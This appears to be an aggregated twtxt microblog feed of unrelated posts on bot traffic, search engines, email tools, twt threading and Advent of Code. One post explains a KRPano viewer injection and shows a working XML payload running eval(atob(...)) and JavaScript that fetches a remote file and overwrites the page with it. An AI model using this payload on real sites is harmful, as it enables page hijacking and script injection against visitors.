reviewing logs this morning and found i have been spammed hard by bots not respecting the robots.txt file. only noticed it because the OpenAI bot was hitting me with a lot of nonsensical requests. here is the list from last month:
- (810) bingbot
- (641) Googlebot
- (624) http://www.google.com/bot.html
- (545) DotBot
- (290) GPTBot
- (106) SemrushBot
- (84) AhrefsBot
- (62) MJ12bot
- (60) BLEXBot
- (55) wpbot
- (37) Amazonbot
- (28) YandexBot
- (22) ClaudeBot
- (19) AwarioBot
- (14) https://domainsbot.com/pandalytics
- (9) https://serpstatbot.com
- (6) t3versionsBot
- (6) archive.org_bot
- (6) Applebot
- (5) http://search.msn.com/msnbot.htm
- (4) http://www.googlebot.com/bot.html
- (4) Googlebot-Mobile
- (4) DuckDuckGo-Favicons-Bot
- (3) https://turnitin.com/robot/crawlerinfo.html
- (3) YandexNews
- (3) ImagesiftBot
- (2) Qwantify-prod
- (1) http://www.google.com/adsbot.html
- (1) http://gais.cs.ccu.edu.tw/robot.php
- (1) YaK
- (1) WBSearchBot
- (1) DataForSeoBot
i have placed some middleware to reject these for now but it is not a foolproof solution.
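A minimal sketch of that kind of middleware, assuming a Python WSGI app (the post does not say what stack is actually in use). The blocklist and the names `is_blocked` and `reject_bots` are made up for illustration. It only matches on the User-Agent header, which any bot can change, so it shares the "not foolproof" caveat.

```python
import re

# Hypothetical blocklist: a few of the crawler names from the list above.
BLOCKED_AGENTS = ("GPTBot", "DotBot", "SemrushBot", "AhrefsBot", "MJ12bot", "BLEXBot")
BLOCKED_RE = re.compile("|".join(re.escape(name) for name in BLOCKED_AGENTS), re.IGNORECASE)


def is_blocked(user_agent):
    """Return True when the User-Agent header names a blocked crawler."""
    return bool(user_agent) and BLOCKED_RE.search(user_agent) is not None


def reject_bots(app):
    """Wrap a WSGI app so blocked crawlers get a 403 before the app runs."""
    def middleware(environ, start_response):
        if is_blocked(environ.get("HTTP_USER_AGENT", "")):
            start_response("403 Forbidden", [("Content-Type", "text/plain")])
            return [b"Forbidden\n"]
        # Everything else is passed through untouched.
        return app(environ, start_response)
    return middleware
```

Wrapping is one line, e.g. `app = reject_bots(app)`; rate limiting or IP checks would have to sit alongside it to catch bots that fake their User-Agent.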
Well, that's another bug: The search https://twtxt.net/search?q=%22LOOOOL%2C+great+programming+tutorial+music%22 yields the wrong hash. It should have been poyndha instead.
Reading "Man's Search for Meaning" by Viktor E. Frankl
Unit Circle
@slashdot@feeds.twtxt.net Who the F+++ still uses goo's search engine anyway xD Shout out to all my homies hosting a Searx instance
Google begins requiring JavaScript for Google Search
Google says it has begun requiring users to turn on JavaScript, the widely used programming language to make web pages interactive, in order to use Google Search. In an email to TechCrunch, a company spokesperson claimed that the change is intended to "better protect" Google Search against malicious activity, such as bots and spam, and to improve the overall Google Search experience for users. The spokesperson noted that, with …
Google Begins Requiring JavaScript For Google Search
Google says it has begun requiring users to turn on JavaScript, the widely-used programming language to make web pages interactive, in order to use Google Search. From a report: In an email to TechCrunch, a company spokesperson claimed that the change is intended to "better protect" Google Search against malicious activity, such as bots and spam, and to improve the over …
So this works by adding some unbounded javascript autoloaded by the KRPano VR Media viewer
the xml parameter has a url that contains the following
<?xml version="1.0"?>
<krpano version="1.0.8.15">
<SCRIPT id="allow-copy_script"/>
<layer name="js_loader" type="container" visible="false" onloaded="js(eval(var w=atob('... OMIT ...');eval(w)););"/>
</krpano>
the omitted part above is the base64-encoded script below:
const queryParams = new URLSearchParams(window.location.search),
  id = queryParams.get('id');
id ? fetch('https://sour.is/superhax.txt')
  .then(e => e.text())
  .then(e => {
    document.open(), document.write(e), document.close();
  })
  .catch(e => {
    console.error('Error fetching the user agent:', e);
  }) : console.error('No');
this script fetches the text at the url https://sour.is/superhax.txt and replaces the document content with it.
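To look at a payload like this without running it, you can decode the base64 string offline, which is roughly what `atob()` does in the browser before `eval()` gets hold of the result. A small sketch; `decode_payload` is a made-up helper and `sample` is a stand-in, since the real encoded string is omitted above.

```python
import base64


def decode_payload(encoded):
    """Decode a base64 string to text for inspection, without executing it."""
    return base64.b64decode(encoded).decode("utf-8", errors="replace")


# Stand-in payload; the real one is elided in the post above.
sample = base64.b64encode(b"console.log('hello')").decode("ascii")
print(decode_payload(sample))
```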
@lime360@lime360.nekoweb.org Down at the moment due to hardware failure of one of my nodes. I have the spare parts to bring it back online, just need to find the time. Sorry for the inconvenience, I just can't afford to run the search engine right now on the remaining two nodes.
@prologic@twtxt.net uhhh what happened to search.twtxt.net
nice! would you mind elaborating a bit?
Is that the scientific method?
I couldn't find anything related when I searched for it.
@andros@twtxt.andros.dev Sorry I missed your messages to #twtxt on IRC. There are people there, but it can take several hours to get a response. E.g. I check it every day or two. I recommend using an IRC bouncer. To answer your question about registries, I used a couple of registries when I first started out, to try to find feeds to follow, but haven't since then. I don't remember which ones, but they were easy to find with web searches.
@prologic@twtxt.net Is it possible to interact with twtxt.net from outside? For example, a search API
I remembered one ISP that disallows IRC stuff on its servers. By searching I found that many ISPs equate IRC with proxies and doorways. This is unfair!
clearly forgot to add my twtxt feed on search.twtxt.net but now here i am hello hi
… it even shows @sorenpeter@darch.dk's article from 2020 in search results
@prologic@twtxt.net I cannot… believe… It took me a "Single Search Query" to get HOOKED!! 🤩 Bonus: tried it from the terminal too and it works.
Behold … "Marginalia"! My new favorite search engine!! And I have @mattof to thank for this find. Here's their Blog post about it since I don't think I could do a better job describing what it is. but, tl;dr: it's a #smallweb focused search engine.
The web is such garbage these days. Or is it the garbage search engines?
@Codebuzz@www.codebuzz.nl I have separate mail boxes for private and work, but flattened both to have a simpler structure. For work, where we use Outlook, I am using categories for organising the mails and privately I am using Vivaldi's labels system. The main idea is to use search and grouping through dynamic saved searches instead of static folders.
So I've flattened my work and private email inboxes to single inbox folders and I don't even know anymore what I was thinking before, trying frantically to organise everything in sub folders. Labels and search filters are the way forward.
I did write up an algorithm for it at some point; I think it is lost in a git comment someplace. I'll put together some pseudo/Go code this week.
Super simple:
Making a reply:
- If yarn has one use that. (Maybe do collision check?)
- Make hash of twt raw no truncation.
- Check local cache for shortest without collision
- in SQL:
select len(subject) where head_full_hash like subject || '%'
Threading:
- Get full hash of head twt
- Search for twts
- in SQL:
head_full_hash like subject || '%' and created_on > head_timestamp
The assumption being replies will be for the most recent head. If replying to an older one it will use a longer hash.
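The steps above can be sketched roughly like this, using an in-memory list instead of SQL. Assumptions, none of them from the post: the full hash is BLAKE2b-256 encoded as lowercase base32, the shortest allowed subject is 7 characters, and a twt is a `(subject, created_on, text)` tuple with comparable timestamps.

```python
import base64
import hashlib


def full_hash(raw_twt):
    """Untruncated hash of the raw twt (BLAKE2b-256 + base32 is an assumption)."""
    digest = hashlib.blake2b(raw_twt.encode("utf-8"), digest_size=32).digest()
    return base64.b32encode(digest).decode("ascii").rstrip("=").lower()


def shortest_subject(head_hash, known_hashes, min_len=7):
    """Shortest prefix of head_hash that no other known hash starts with."""
    others = [h for h in known_hashes if h != head_hash]
    for length in range(min_len, len(head_hash) + 1):
        prefix = head_hash[:length]
        if not any(h.startswith(prefix) for h in others):
            return prefix
    return head_hash


def thread_replies(head_hash, head_time, twts):
    """Replies whose subject is a prefix of the head hash and that are newer than the head.

    Mirrors: head_full_hash like subject || '%' and created_on > head_timestamp
    """
    return [t for t in twts if head_hash.startswith(t[0]) and t[1] > head_time]
```

A reply to a recent head gets the short prefix; an older head whose short prefix has since been reused by a newer twt needs a longer one, which is the trade-off described above.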
Diving into mblaze, I think I've nearly* reached peak email geek.
Just a bunch of shell commands I can pipe together to search, list, view and reply to email (after syncing it to a local Maildir).
EXAMPLES at https://git.vuxu.org/mblaze/tree/README
So far I'm using most of the tools directly from the command line, but I might take inspiration from https://sr.ht/~rakoo/omail/ to make my workflow a bit more efficient.
*To get any closer, I think I'd have to hand-craft my own SMTP client or something.
@movq@www.uninformativ.de Yes, the tools are surprisingly fast. Still, magrep takes about 20 seconds to search through my archive of 140K emails, so to speed things up I would probably combine it with an indexer like mu, mairix or notmuch.
So I'm a location based system, how exactly do I reply to one of these two Twts from @Yarns@search.twtxt.net ?
2024-09-07T12:55:56Z 🥳 NEW FEED: @<twtxt http://edsu.github.io/twtxt/twtxt.txt>
2024-09-07T12:55:56Z 🥳 NEW FEED: @<kdy https://twtxt.kdy.ch/twtxt.txt>
@falsifian@www.falsifian.org comments on the feeds as in nick, url, follow, that kind of thing? If that, then not interested at all. I envision an archive that would allow searching, and potentially browsing threads on a nice, neat interface. You will have to think, though, on other things. Like, what to do with images? Yarn allows users to upload images, but also embed it in twtxts from other sources (hotlinking, actually).
@prologic@twtxt.net I believe you when you say registries as designed today do not crawl. But when I first read the spec, it conjured in my mind a search engine. Now I don't know how things work out in practice, but just based on reading, I don't see why it can't be an API for a crawling search engine. (In fact I don't see anything in the spec indicating registry servers shouldn't crawl.)
(I also noticed that https://twtxt.readthedocs.io/en/latest/user/registry.html recommends "The registries should sync each others user list by using the users endpoint". If I understood that right, registering with one should be enough to appear on others, even if they don't crawl.)
Does yarnd provide an API for finding twts? Is it similar?
@prologic@twtxt.net I guess I thought they were search engines. Anyway, the registry API looks like a decent one for searching for tweets. Could/should yarn.social pods implement the same API?
@prologic@twtxt.net What's the difference between search.twtxt.net and the /api/plain/tweets endpoint of a registry? In my mind, a registry is a twtxt search engine. Or are registries not supposed to do their own crawling to discover new feeds?
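For reference, a sketch of what querying that endpoint could look like from a client. It assumes the registry takes the search term in a `q` parameter and answers with one tab-separated line per tweet (nick, feed URL, timestamp, text), which is how I read the registry docs linked above; `tweets_url`, `parse_tweets` and the example host are made up.

```python
from urllib.parse import urlencode


def tweets_url(registry_base, query):
    """Build the search URL for a registry's /api/plain/tweets endpoint."""
    return registry_base.rstrip("/") + "/api/plain/tweets?" + urlencode({"q": query})


def parse_tweets(body):
    """Parse a plain-text response: nick, url, timestamp, text separated by tabs."""
    rows = []
    for line in body.splitlines():
        parts = line.split("\t", 3)
        if len(parts) == 4:  # skip blank or malformed lines
            nick, url, timestamp, text = parts
            rows.append({"nick": nick, "url": url, "timestamp": timestamp, "text": text})
    return rows
```

Fetching is then just an HTTP GET on `tweets_url("https://registry.example", "search")` and handing the body to `parse_tweets`.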
Never mind, I simply searched and deleted them all (D then ~f sender). :-) Phew!
s#(www\.)?youtube\.com/watch\?v=([^?&]+)#tubeproxy.mills.io/play/\2# for example?
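The same rewrite as a Python sketch, in case the substitution is easier to check that way. The `/play/<id>` target comes from the expression above; `to_tubeproxy` is a made-up name, and it only handles `watch?v=` links, not `youtu.be` short links.

```python
import re

# Capture only the video id; the optional "www." is matched but not captured.
YOUTUBE_RE = re.compile(r"(?:www\.)?youtube\.com/watch\?v=([^?&\s]+)")


def to_tubeproxy(text):
    """Rewrite YouTube watch links in text to tubeproxy.mills.io/play/<id>."""
    return YOUTUBE_RE.sub(r"tubeproxy.mills.io/play/\1", text)
```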
Have not tried any of them, but some of these seem to fit the bill:
@movq@www.uninformativ.de I've been using Qwant for a while but it was down earlier today (as well) so I switched back to my trusty Searx Redirector
… This utility forwards your search query to one of 11 random volunteer-run public servers to thwart mass surveillance.
QOTD: Which web search engine do you use?
Hah 🤣 @dfaria@twtxt.net Your @dfaria.eu@dfaria.eu feed really does consume about >50% of a "Discover" search with filters "Without replies" and "Hide my posts". 🤣
36/2 = 18 at 25 Twts per page, that's about 72% of the search/view real estate you're taking up! wow 🤩 I'd be very interested to hear what ideas you have to improve this? Those search filters were created so you could sift through either your own Timeline or the Discover view easily.
Added support for #tag clouds and #search to timeline. Based on code from @dfaria.eu@dfaria.eu

Live at: http://darch.dk/timeline/?profile=https://darch.dk/twtxt.txt
The things you come across… Here, lots of books in plain-text format: https://github.com/ganesh-k13/shell/tree/master/test_search/www.glozman.com/TextPages
Google Chrome Gains AI Features Including a Writing Helper
Google is adding new AI features to Chrome, including tools to organize browser tabs, customize themes, and assist users with writing online content such as reviews and forum posts.
The writing helper is similar to an AI-powered feature already offered in Google's experimental search experience, SGE, which helps users draft emails in various tones and lengths. W …
So, I finally got day 17 to under a second on my machine. (in the test runner it takes 10)
I implemented a Fibonacci Heap to replace the priority queue to great success.
https://git.sour.is/xuu/advent-of-code/src/branch/main/search.go#L168-L268
OH MY FREAKING HECK. So.. I made my pather able to run as Dijkstra or A* if the interface includes a heuristic.. when i tried without the heuristic it finished faster :|
So now to figure out why it's not working right.
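For anyone following along, the "Dijkstra or A* depending on whether there is a heuristic" idea looks roughly like this. This is a sketch, not the linked Go code: it uses Python's binary heap (`heapq`) rather than a Fibonacci heap, and the `neighbors` callback and plain node states are assumptions. The real puzzle state is more involved.

```python
import heapq


def find_path_cost(start, goal, neighbors, heuristic=None):
    """Cheapest cost from start to goal: Dijkstra if heuristic is None, else A*.

    neighbors(node) yields (next_node, step_cost) pairs; nodes must be
    hashable and orderable (e.g. tuples of ints) so heap ties can be broken.
    """
    h = heuristic or (lambda node: 0)  # zero heuristic turns A* into Dijkstra
    best = {start: 0}
    queue = [(h(start), 0, start)]
    while queue:
        _, cost, node = heapq.heappop(queue)
        if node == goal:
            return cost
        if cost > best.get(node, float("inf")):
            continue  # stale queue entry, a cheaper route was already found
        for nxt, step in neighbors(node):
            new_cost = cost + step
            if new_cost < best.get(nxt, float("inf")):
                best[nxt] = new_cost
                heapq.heappush(queue, (new_cost + h(nxt), new_cost, nxt))
    return None  # goal not reachable
```

With a heuristic that never overestimates, both modes return the same cost and A* should expand fewer nodes. If the heuristic is expensive to compute or barely informative, the plain Dijkstra run can still end up faster in wall-clock time.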
man… day17 has been a struggle for me.. i have managed to implement A* but the solve still takes about 2 minutes for me.. not sure how some are able to get it under 10 seconds.
Solution: https://git.sour.is/xuu/advent-of-code/src/branch/main/day17/main.go
A* PathFind: https://git.sour.is/xuu/advent-of-code/src/branch/main/search.go
some seem to simplify the seen check to only be horizontal/vertical instead of each direction.. but it doesn't give me the right answer
The word forms is part two. In this one you want to find the first digit and last digit. Think searching "1" - "9"
I could have made my search smarter using a prefix search rather than scanning the full buffer for each iteration.
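A sketch of the prefix-search idea: walk the line once and, at each position, check whether a digit or a digit word starts there, instead of scanning the whole buffer for every candidate. I'm assuming "word forms" means the spelled-out digits "one" to "nine"; the function names are made up.

```python
WORDS = ("one", "two", "three", "four", "five", "six", "seven", "eight", "nine")


def digits_in(line, with_words=False):
    """All digits in line, left to right; optionally also spelled-out digits."""
    found = []
    for i, ch in enumerate(line):
        if ch in "123456789":
            found.append(int(ch))
        elif with_words:
            # Prefix check at position i only; overlapping words are still seen
            # because the scan moves one character at a time.
            for value, word in enumerate(WORDS, start=1):
                if line.startswith(word, i):
                    found.append(value)
                    break
    return found


def first_and_last(line, with_words=False):
    """(first digit, last digit) of the line, or None when it has no digits."""
    found = digits_in(line, with_words)
    return (found[0], found[-1]) if found else None
```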
@prologic@twtxt.net I use the gmail webapp for work, and I have to say that over the years it's gotten less and less usable. There are so many little usability things that it's bad at. For instance, if you select a message and hit the Delete key nothing happens. The message is not put in the trash like you'd expect. There are issues like that scattered all over the app. I suspect they spend most of their energy on the spyware side of gmail and dedicate less to making it a useful app for end users (which seems to be true of their search engine too).
@jmjl@tilde.green I'm sorry that I'm not super knowledgeable about alternatives to jmp.chat but I'll tell you what I know.
You're probably right about jmp.chat not working for you, at least as it is now. You can only get US and Canadian phone numbers through it last time I checked, so if you're not in either of those countries you'd be making international calls all the time and people who wanted to call you would be making international calls too.
I've seen people talk about using SIP as an intermediary: you can bridge SIP-to-XMPP, and bridge SIP-to-PSTN (PSTN = "public switched telephone network", meaning normal telephone). You can skip the SIP-to-XMPP side if you're comfortable using a SIP client. I don't know very much about SIP or PSTN so I am not sure what to recommend, but perhaps this helps your search queries.
There are a fair number of services like TextNow that let you sign up for a real telephone number that you can then use via their app (I wouldn't use TextNow; they had tons of spyware in their app). I don't know if that kind of service works for you but if it does perhaps you'd be able to find one of them that isn't horrible. This page (https://alternativeto.net/software/jmp-chat/) has a bunch of alternatives; I can't vouch for any of them but maybe it's a starting point if you want to go this route.
Good luck!
@abucci@anthony.buc.ci Are you still with jmp.chat? If so, are you still as happy as you were before? Have you experienced any reliability issues, especially with receiving phone calls?